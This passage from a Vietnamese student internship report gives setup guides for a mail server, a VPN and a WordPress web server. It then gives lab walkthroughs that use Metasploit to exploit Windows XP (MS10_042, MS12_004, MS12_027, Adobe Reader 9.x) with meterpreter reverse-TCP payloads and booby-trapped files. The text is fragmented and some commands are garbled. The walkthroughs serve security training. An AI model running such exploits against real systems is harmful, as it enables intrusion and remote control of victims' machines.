chủ ảo.

Dowload

bộ cài đặt

Mdeamon

và chạy

file

Setup.exe

Trước tiên, bạn tải phiên bản MDaemon Mail Server mới nhất và bắt đầu quá trình cài đặt.Bấm "Next" để tiếp tục.

102


Đánh dấu vào ô "I have read and I agree with all the terms of this license agreement"

Chọn đường dẫn lưu trữ của chương trình, mặc định sẽ là ổ C hệ thống (ổ đĩa có cài hệ điều hành Microsoft Windows).

Lựa chọn phiên bản cài đặt, nếu bạn có key đăng ký thì nhập vào ô phía dưới. Ở ví dụ sử dụng là phiên bản free hoặc miễn phí 30 ngày của phiên bản Pro.

103


Tùy chọn các thông tim phù hợp với vị trí, ở đây là VietNam

Điền đúng thông tin về quy mô của tổ chức hoặc công ty.

Sau khi hoàn tất các bước trên, chọn "Next" để bắt đầu cài đặt.

104


Chờ đợi cho quá trình cài đặt hoàn tất.

Điền tên Domain chính xác ví dụ: nguyendinhduy.tk

Điền địa chỉ DNS chính (Primary) và dự phòng (Backup)

105


Giữ nguyên lựa chọn "Setup MDaemon as a system service"

Bấm "Finish" để kết thúc quá trình cài đặt và cấu hình ban đầu, bắt đầu sử dụng

106


Giao diện sau khi cài đặt thành công.

Tạo 1 tài khoảng mới vào Account New Account…

107


Nhập thông tin vào Email address và Email Password. Click OK để tạo tài khoảng Email.

Vào OutLook Mail.

108


Cấu hình Out Look mail để quán lý mail cho tài khoảng [email protected]. Nhập tên hiện thị vào Display name và click Next>

Nhập địa chỉ Email và Click Next>

109




Nhập địa chỉ IP vào 2 ô Incoming và Outgoing và click Next.

Nhập tên tài khoảng và mật khẩu. Click Next.

110


Click Finish để hoàn tất cấu hình quản lý mail cho tài khoảng test.

Tạo mail để kiểm ra việc gửi mail từ tài khoảng test đến 1 e mail bất kỳ.

111


Vào mail được gửi và kiểm tra Mail.

Xem mail tu tài khoảng [email protected]

Trả lời lại Mail của tài khoảng [email protected]

112


Vào lại mail của tài khoảng [email protected] và đã nhận được hồi âm.

Như vậy chúng ta đã hoàn thành việc cài đặt và quản lý 1 mail Server trên phần mềm Mdeamon.

1.7.2.2 Kết Nối VPN thông qua máy chủ ảo VPS.

Việc triển khai một mạng riêng ảo có nhiều dịch vụ và chức năng cần phải làm việc cùng nhau một cách trôi chảy và dễ dàng, vì vậy những người dùng truy cập từ xa có thể được định danh và xác thực; các được hầm có thể được tạo lập, duy trì và quản lý cho hàng trăm người dùng; việc định tuyến có thể kiểm soát tất cả luồng lưu lượng qua Gateway, và trong khi tất các những thứ này đang tiếp tục, hiệu suất và sự an toàn cần được duy trì.

Các thành phầm phải được cài đặt để tạo ra một hệ thống mạng riêng ảo hoạt động đúng đắn. Để đưa ra quyết định đúng lúc triển khai các kết nối mạng riêng ảo truy cập từ xa, ta phải hiểu tất cả các thành phần liên quan. Trong chương "Tổng quan về mạng riêng ảo" chúng ta đã thảo luận về kiểu kịch bản mạng riêng ảo truy cập từ xa, trong đó nhiều Client truy cập tới một cổng kết nối đơn vào các tài nguyên trong mạng

113




Intranet. Trong phần này ta sẽ mô tả các thành phần của các kết nối mạng riêng ảo truy cập từ xa và các quan điểm thiết kế gắn với chúng.

Mô hình VPN Client to Site:

Hình 2.3.1.1.7.1 Mô hình VPN Client to Site.

Để cấu hình và thiết lập kết nối VPN Client to Site trải qua các bước sau:

Đăng nhập vào máy chủ ảo VPS với quyền quản trị.

114


Vào Start Programs Administrative Tools Routing and remote access để cấu hình.

Giao diện Routing and remote Access

115


Click chuột phải vào server bà chọn Configure and Enable Routing and Remote Access.

Cửa sổ Routing and remote access server setup wizard hiện lên ta Click Next>

116


Ta chọn Custom Configutation.

Đánh dấu vào 2 mục VPN access và mục Lan routing.

Click Next>

117


Click Finish để tiến hành kích hoạt.

Click Yes để bắt đầu.

Routing and Remote Acces đã sẵn sàng.

118


Để cấu hình dãi địa chỉ IP khi các máy Client truy cập vào VPN sẽ được cấp ta right click vào Server và chọn Properties.

Chuyễn sang tab IP và chọn Static andress pool.

119


Nhập dãy địa chỉ bắt đầu vào Start IP address và dãy địa chỉ kết thúc vvào End IP address và Click OK để chấp nhận.

Như vậy chúng ta đã hoàn tất cấu hình cho phép có thể truy cập VPN vào máy chủ. Tiếp theo ta cần tào tài khoảng để có thể đăng nhập vào máy chủ. Bằng cách Right click vào My conputer và chọn Manage.

120


Tiếp theo ta vào System tools Local Users and Groups Users

Right Click vào User và chọn New User…

121


Tạo 1 user và điền tên user vào mục User name và mật khẩu vào ô Password và nhập lại mật khẩu vào ô Confim password.

Click Create để tạo user.

Tượng tự tạo 1 user khác có tên là client 2

122


Để User có quyền truy cập VPN ta right click vào tài khoảng cần cấp quyền và chọn Properties

123


Sang tab Dial-in và chọn Allow Access để cấp quyền và click OK để hoàn tất. Tương tự cho user có tên là Client2.

Chuẩn bị 2 máy ảo. Trên máy ảo thứ 1 ta vào Start Settings Network Connections.

124


Click vào Create a new Connection.

Hộp thoại New Connection Wizard hiện lên và click Next>

125


Chọn mục Connect to the Network at my workplace và click Next>

Click chọn Virual Private Network connection và chọn Next>

126


Nhập tên công ty vào ô company name và click Next>

Click Do not dial the intial connection và click Next>

127


Nhập địa chỉ IP của máy chủ hoặc tên domain đã đăng ký và click Next>

Chọn Anyone’s use và click Next>

128


Chọn add a shortcut to this connection to my desktop để thuận tiện cho lần kết nối sau và click Finish để hoàn tất.

Màn hình đăng nhập hiện lên ta nhập tên User và Password cần kết nối và click Connect.

129


Sau khi kết nối thành công thì bên góc phải màn hình sẽ có kết nối mạng thứ 2.

Double click vào biểu tượng mạng kết nối chuyển sang tab Details để xem chi tiết.

130


Các bước thực hiện tương tự cho Client 2. Và kết quả cho Client 2 như sau.

Trên Client1 tiến hành ping đến địa chỉ Clien2.

131


Và trên Client 2 ping đến địa chỉ Clien1.

Trên Clien1 tiến hành share 1 folder cho Clien 2. Bằng cách tạo 1 folder right click chọn properties tab sharing chọn Share this folder click OK.

132


Trên Client 2 vào Start run gõ //địa chỉ client 2 (10.0.0.101) và click OK.

Đã thấy được thư mục mà Client 1 đã share.

Như vậy chúng ta đã hoản thành việc cài đặt và cấu hình VPN client to site.

1.7.2.3 Cài đặt và cấu hình Web Server trên VPS.

XAMPP là một bộ công cụ lập trình PHP có thể cài đặt được trên nhiều nền tảng khác nhau. Chữ X đầu tiên trong cụm từ XAMPP ám chỉ cross-platform nghĩa là XAMPP có thể chạy trên Windows, Linux, Mac OS, Solaris, còn các ký tự còn lại mang các ý nghĩa sau:

A = Apache, XAMPP bao gồm 1 Apache HTTP Server giúp chạy các ứng dụng web.

M = MySQL, hệ quản trị cơ sở dữ liệu My SQL cũng được bao gồm trong XAMPP.

P = PHP – ngôn ngữ lập trình PHP.

P = Perl – ngôn ngữ lập trình Perl.

Sau đây chúng ta cùng cài đặt và cấu hình Web Server bằng Xampp 1.7.3

133


Chúng ta dowload và tiến hành cài đặt bằng file

Bạn chọn ngôn ngữ cài đặt là English và nhấn OK để tiếp tục.

Bạn nhấn Next ở màn hình tiếp theo.

134


Theo mặc định XAMPP sẽ được cài đặt vào ổ C theo đường dẫn C:\xampp, bạn có thể nhấn Browse và chọn đường dẫn cài đặt khác

Bạn nhận chọn các service kèm theo XAMPP trong mục SERVICE SECTION sau đó nhấn Install để tiếp tục.

135


Màn hình hiển thị tiến độ cài đặt XAMPP hiện ra.

Quá trình cài đặt XAMPP hoàn tất, bạn nhấn vào nút Finish kết thúc.

136


XAMPP sẽ tự động cài đặt các service mà bạn đã chọn ở mục SERVICE SECTION bên trên, đầu tiên là Apache service.

Tiếp đó là MySQL service

Quá trình cài đặt các service hoàn tất, bạn nhấn OK để tiếp tục.

Bạn nhấn OK ở màn hình tiếp theo để bật XAMPP Control Panel.

137


Sau khi cài đặt xong các bạn click Start ở mục Apache và MySql trong XAMOO Control Panel Application.

Vào trình duyệt web và gõ vào localhost. Và chọn ngôn ngữ là English.

138


Sau khi chọn ngôn ngữ chúng ta và click pHp my admin.

Bạn nhập tên cơ sở dữ liệu vào ô create new database và click Create để tạo database.

139


Và Databae đã được tạo.

Tiếp theo các bạn vào đường dẫn cài đặt xampp\htdocs và copy mã nguồn wordpress mà chúng ta đã dowload trên internet.

Vào thư mục wordpress mà chúng ta vừa mới copy xong và tìm file wp-config-sample.php và mở nó lên bằng word pad.

140


Tìm và sửa thông tin lại như hình.

Đổi tên file vừa sửa chửa thành wp-config.php

Vào đường dần localhost/wordpress/wp-admin/install.php. Sau đó điền các thông tin cần thiết.

141


Sau đó click Cài đặt WordPess.

Cấu hình Wordpress thành công. Ta Clich Đăng Nhập.

142


Bạn điền thông tin vừa thiết lập vừa rồi và click Đăng Nhập.

Màn hình sau khi đăng nhập thành công.

143


Ta vào Cài đặt Tổng Quan điền địa chỉ chúng ta muốn truy cập khi chúng ta lướt web vào 2 ô Wordpress address và Site Address.

Và đây là trang chủ của trang Web chúng ta khi vừa tạo xong.

144


Và sau khi đã trang trí cho trang web của chúng ta.

Như vậy chúng ta đã hoàn thành việc tạo 1 trang web cho riêng mình.

1.7.3 Bảo mật Windows

1.7.3.1 Khai thác lỗ hổng trên Windows XP với mã lỗi MS10_042

Chuẩn bị 2

máy ảo:

Windows XP

(nạn nhân) và

máy Back

Track 5r3 (máy

tấn công nạn

nhân)

145


Trên máy Back

Track cấu hình

địa chỉ IP trong

bài lab này cho

máy là:

192.168.1.5

Trên máy Back

track vào

chương trình

terminal và gõ

lệnh

msfconsole

Tìm mã lỗi

bằng công cụ

metaploit bằng

cách gõ lệnh

search

ms10_042

146


Sau khi seach

được mã lỗi ta

dùng lệnh use

và copy mã lỗi

đã tìm được.

Dùng lệnh

show options

để biết thêm

các câu lệnh

cần thiết.

Dùng lệnh

SRVHOST

<địa chỉ ip

máy

backtrack>

Dùng lệnh set

PAYLOAD

windows/meter

preter/preverse

_tcp

147


Dùng lệnh set

LHOST <ip

backtrack>

Dùng lệnh

exploit để tiến

hành khai thác

lỗi. Chú ý

đường dẫn

http://192.168.

1.5:80/ nếu

máy nạn nhân

vào đường dẫn

này sẽ bị hack.

Trở lại máy

Windows XP.

Kiểm tra địa

chỉ IP máy XP.

Với địa chỉ ip

máy XP là

192.168.1.6

Trên máy XP

ta vào trình

duyệt web và

gõ đường dẫn

http://192.168.

148


http://192.168.1.5:80/

http://192.168.1.5:80/

1.5:80/

Trên máy XP

tự động xuất

hiện hộp thoại

Help and

Support.

Trên máy Back

Track bắt đầu

nhận thấy có

sự kết nối đến

địa chỉ

http://192.168.

1.5:80/

Và nhận thấy

có địa chỉ

192.168.1.6 kết

nối vào. Và tạo

phiên kết nối

vào nó.

149


Trên máy back

track ta gõ lệnh

sessions để

kiểm tra.

Dùng lệnh

sessions –i 1

Dùng lệnh

sysinfo để xem

thông tin máy

nạn nhân. Và

như vậy ta đã

khai thác thành

công lỗ hổng

MS10_042

trên máy XP.

1.7.3.2 Khai thác lỗ hổng bảo mật Win XP mã lỗi MS12_004

Chuẩn bị 2

máy ảo:

Windows

XP (nạn

nhân) và

máy Back

Track 5r3

(máy tấn

công nạn

nhân)

150


Trên máy

Back

Track cấu

hình địa

chỉ IP

trong bài

lab này

cho máy

là:

192.168.1.

5

Trên máy

Back track

vào

chương

trình

terminal và

gõ lệnh

msfconsole

151


Tìm mã lỗi

bằng công

cụ

metaploit

bằng cách

gõ lệnh

search

ms12_004

Sau khi

seach được

mã lỗi ta

dùng lệnh

use và

copy mã

lỗi đã tìm

được.

152


Dùng lệnh

show

options để

biết thêm

các câu

lệnh cần

thiết.

Dùng lệnh

SRVHOST

<địa chỉ ip

máy

backtrack>

Dùng lệnh

set

PAYLOA

D

windows/

meterprete

r/preverse_

tcp

Dùng lệnh

set LHOST

<ip

backtrack>

153


Dùng lệnh

exploit để

tiến hành

khai thác

lỗi. Chú ý

đường dẫn

http://192.

168.1.5:80

80/ nếu

máy nạn

nhân vào

đường dẫn

này sẽ bị

hack.

Trở lại

máy

Windows

XP. Kiểm

tra địa chỉ

IP máy

XP. Với

địa chỉ ip

máy XP là

192.168.1.

6

154


http://192.168.1.5:8080/

http://192.168.1.5:8080/

http://192.168.1.5:8080/

Trên máy

XP ta vào

trình duyệt

web và gõ

đường dẫn

http://192.

168.1.5:80/

Trên máy

XP tự động

xuất hiện

hộp thoại

yêu cầu

chạy

Windows

Media

Player.

Nếu chọn

Run sẽ bị

hack.

Trên máy

Back

Track bắt

đầu nhận

thấy có sự

kết nối đến

địa chỉ

http://192.

168.1.5:80

80/

155


Và nhận

thấy có địa

chỉ

192.168.1.

6 kết nối

vào. Và tạo

phiên kết

nối vào nó.

Dùng lệnh

sessions –i

1

Dùng lệnh

sysinfo để

xem thông

tin máy

nạn nhân.

Và như

vậy ta đã

khai thác

thành công

lỗ hổng

MS12_004

trên máy

XP.

156


1.7.3.3 Khai thác lỗ hổng trên Win XP với lỗi Adobe Reader 9.X

Chuẩn bị 2

máy ảo:

Windows XP

(nạn nhân) và

máy Back

Track 5r3 (máy

tấn công nạn

nhân)

Trên máy Back

Track cấu hình


bài lab này cho

máy là:

192.168.1.5

Trên máy Back

track vào

chương trình

terminal và gõ

lệnh

msfconsole

157


Tìm mã lỗi

bằng công cụ

metaploit bằng

cách gõ lệnh

user

exploit/windo

ws/fileformat/a

dobe_pdf_emb

edded_exe

Dùng lệnh

show options

để biết thêm

các câu lệnh

cần thiết.

Dùng lệnh

FILENAM

ETênFile

Dùng lệnh set

INFILENAM

EĐường_Dẫn

_file_pdf_bất_

kỳ.

Dùng lệnh set

PAYLOAD

windows/meter

preter/reverse_

158


tcp để sử dụng

mã độc.

Dùng lệnh set

LHOS

Tip_backtrack

.

Dùng lệnh

se

tLPORTport_

tùy_ý_muốn_

mở

Dùng lệnh

exploit để tiến

hành khai thác

lỗi. .

Copy file đã

tiêm mã độc ra

Desktop.

Copy file có

mã độc vào

máy Windows

XP bằng lệnh

copy và past

vào máy XP.

159


Trên máy

BackTrack sẽ

lắn nghe kết

nối bằng cách

sử dụng lệnh

user

exploit/multi/h

ander.

Sau đó set

LHO

Tip_backtrack

Set LPORT

như_khai_báo_

port_trên.

Sau đó dùng

lệnh exploit để

lắng nghe.

Trên máy XP

tiến hành đọc

file có mã độc

và xuất hiện

hộp thoại. Nếu

Click Open sẽ

bị hack.

160


Trên máy Back

track gõ lệnh

getuid để xem

tên máy.

Gõ lệnh

sysinfo để xem

thông tin máy

nạn nhân. Như

vậy chúng ta

đã hoàn thành

khai thác lỗi

trên Adobe

Reader 9.X

1.7.3.4 Khai thác lỗ hổng trên Win XP với mã lỗi MS12_027

Chuẩn bị 2

máy ảo:

Windows XP

(nạn nhân) và

máy Back

Track 5r3 (máy

tấn công nạn

nhân)

161


Trên máy Back

Track cấu hình


bài lab này cho

máy là:

192.168.1.5

Trên máy Back

track vào

chương trình

terminal và gõ

lệnh

msfconsole

Tìm mã lỗi

bằng công cụ

metaploit bằng

cách gõ lệnh

search

ms12_027

162


Sau khi seach

được mã lỗi ta

dùng lệnh use

và copy mã lỗi

đã tìm được.

Dùng lệnh

show options

để biết thêm

các câu lệnh

cần thiết.

Dùng lệnh

se

tFILENAMEt

ên_file.

Dùng lệnh set

PAYLOAD

windows/meter

preter/preverse

_tcp

163


Dùng lệnh set

LHOST <địa

chỉ ip máy

backtrack>

Dùng lệnh

exploit để khai

thác lỗi.

Copy file đã

tiêm mã độc ra

ngoài màng

hình destop

bằng lệnh

cpđường_dẫn

file

nguồnđường

dẫn_fil_ đích

Dùng lệnh

use/exploit/mul

ti/handler

Dùng lệnh set

PAYLOAD

windows/meter

preter/reverse_

tcp

164


Dùng lệnh set

LHOST <ip

backtrack>

Dùng lệnh set

LHOS

Tip_back_trac

k

Dùng lệnh

exploit để bắt

đầu lắng nghe.

Trên máy Back

track copy file

đã có mã độc ở

ngoài desktop

vào var/www

để nạn nhân

dowload về.

Khởi động

dịch vụ

aphache trên

Backtrack

bằng lệnh

/etc/init.d/apac

he2 start

165


Trên máy XP

ta vào trình

duyệt web để

dowload file ta

đã up trên máy

back track

bằng cách gõ:

192.168.1.5/du

y11145941.doc

Xuất hiện hộp

thoại và nhấn

Save để

dowload

Khi máy XP

mở file word

có nhiễm mã

độc thì sẽ bị

hack.

166


Bênh máy

Back track đã

nhận thấy 1 kết

nối và tạo

phiên kết nối

với nạn nhân.

Dùng lệnh

sysinfo để

kiểm tra. Như

vậy ta đã hoàn

thành khai thác

lỗi MS12_027

trên win XP.

1.8 Các kết quả đạt được

Sau khi tìm hiểu và triển khai các dịch vụ trên máy ảo VMWare và VPS em đã có kiến thức về:

- Nguyên lý cơ bản của hệ điều hành mạng, kiến thức về hệ thống mạng, có kỹ năng cần thiết để cài đặt, cấu hình hoàn chỉnh mạng doanh nghiệp cỡ vừa và lớn dựa vào Windows Server 2008.

- Hiểu về cấu trúc hạ tầng, thiết kế và quản trị hệ thống mạng, nhiệm vụ quản lý bao gồm việc điều hành và hỗ trợ hệ thống.

- Triển khai, thiết kế, quản lý và chuẩn đoán hỏng hóc cho một hệ thống mạng.- Có các kiến thức trên nền tảng công nghệ Windows Server 2008.

1.8.1 Kinh nghiệm thực tế

Có cái nhìn thực tế về việc cấu hình, quản lý một hệ thống mạng của

một doanh nghiệp thông qua nền tảng.

Được trực tiếp tiếp xúc những công nghệ và thiết bị mà trước đây chỉ

biết đến thông qua sách vở.

Được vận dụng những kiến thức tiếp thu trên lớp vào công việc thực tế.

167


Bổ sung và trau dồi những thiếu sót về kiến thức trong quá trình học

trên lớp.

Trực tiếp triển khai và cấu hình trên máy chủ ảo VPS.

Có kinh nghiệm trong việc khắc phục sự cố khi hệ thống gặp lỗi.

1.8.2 Hoàn thiện bản thân

Các thành viên trong nhóm đã định hướng rõ ràng mục tiêu sắp tới sẽ

làm.

Tự tin hơn trong việc giao tiếp với mọi người trong công việc.

Nâng cao khả năng làm việc nhóm cũng như khả năng tự bản thân giải

quyết vấn đề khó khăn gặp phải trong công việc.

1.8.3 Các kiến thức được lĩnh hội

Kiến thức thực tế về hệ thống mạng của doanh nghiệp.

Hiểu các thành phần công nghệ mạng doanh nghiệp vừa và nhỏ.

168


Chương III. Kết Luận

Nhìn chung các công việc em đã cơ bản hoàn thành, tuy nhiên sẽ còn nhiều

thiếu sót, đa phần là quá trình tự học. Vì thế mong Thầy cô, các bạn đánh giá

và đưa ra những ý kiến đóng góp để khắc phục và sữa chữa. Bênh cạnh trình

độ chuyên mông cũng cần có những kỹ năng mềm như kỹ năng giao tiếp, làm

việc nhóm cũng hết sức quan trọng. Thực tập là giai đoạn quan trọng của sinh

viên, giúp sinh viên có cơ hội làm việc thực tế nhằm củng cố kĩ năng, chuẩn bị

cho giai đoạn làm việc thật sau khi tốt nghiệp. Trong quá trình thực tập tại

Trung tâm ATHENA, nhóm chúng em được tiếp xúc với một môi trường làm

việc chuyên nghiệp, các công nghệ, thiết bị,các mô hình thực tế... Qua đó

nhóm học hỏi được những kinh nghiệm nhất định và có những suy nghĩ đóng

góp sau:

Về công việc: Để thiết kế và triển khai một hệ thống mạng cho một

công ty, cần có nhiều bộ phận phối hợp với nhau để thực hiện và hoàn

thành dự án.

Về phát triển kỹ năng:Để các bộ phận có thể phối hợp tốt mỗi nhân

viên cần có những kỹ năng cơ bản để làm việc trong đội, nhóm:

o Làm việc nhóm: Kỹ năng làm việc nhóm là khả năng làm việc hiệu quả trong

đội ngũ. Đó là việc có thể sử dụng đúng người để có được kết quả tốt nhất và

luôn sẵn sàng để có thể lãnh đạo hoặc phối hợp làm theo.

o Tìm hiểu – thu thập thông tin: Quản lý thông tin là khả năng biết được nơi để

có được thông tin cần thiết - để tìm kiếm, định vị, và thu thập nó. Điều này có

thể liên quan đến việc sử dụng các nguồn lực khác nhau, cho dù chúng là từ

những con người hoặc từ các tài liệu trong thế giới rộng lớn của công nghệ

o Kỹ năng giải quyết vấn đề - Tính linh hoạt : Tính linh hoạt là khả năng thích

nghi để giải quyết công việc chúng ta gặp phải hàng ngày trong công việc lẫn

đời sống riêng. Giải quyết vấn đề là xác định vấn đề, nghiên cứu giải pháp và

đưa ra những quyết định hiệu quả.

169


Về công nghệ: với lợi thế là công ty hoạt động trong lĩnh vực công

nghệ thông tin ,ATHENA có hạ tầng CNTT hiện đại ,an toàn và thông suốt

170


Chương IV. Tài liệu tham khảo

[1] www.youtube.com/channel/trojan-backdoor-athena

[2] http://www.youtube.com/Thang VoDo

[3] Barrie Dempster - Kerry Garrison, TrixBox Made Easy, Packt Publishing,

2006.

[4] Theodore Wallingford, VoIP Hacks, O'Reilly Media, 2006

[5] Paul Mahle, VoIP telephony with Asterisk, Mahler, 2004

[6] http:///www.voip-info.org

[7] http://google.com

[8] http://www.quantrimang.com

[9] http://thuvien-it.net

171


http://www.quantrimang.com/

http://google.com/

http://www.youtube.com/Thang

Documents

Bao cao ck update final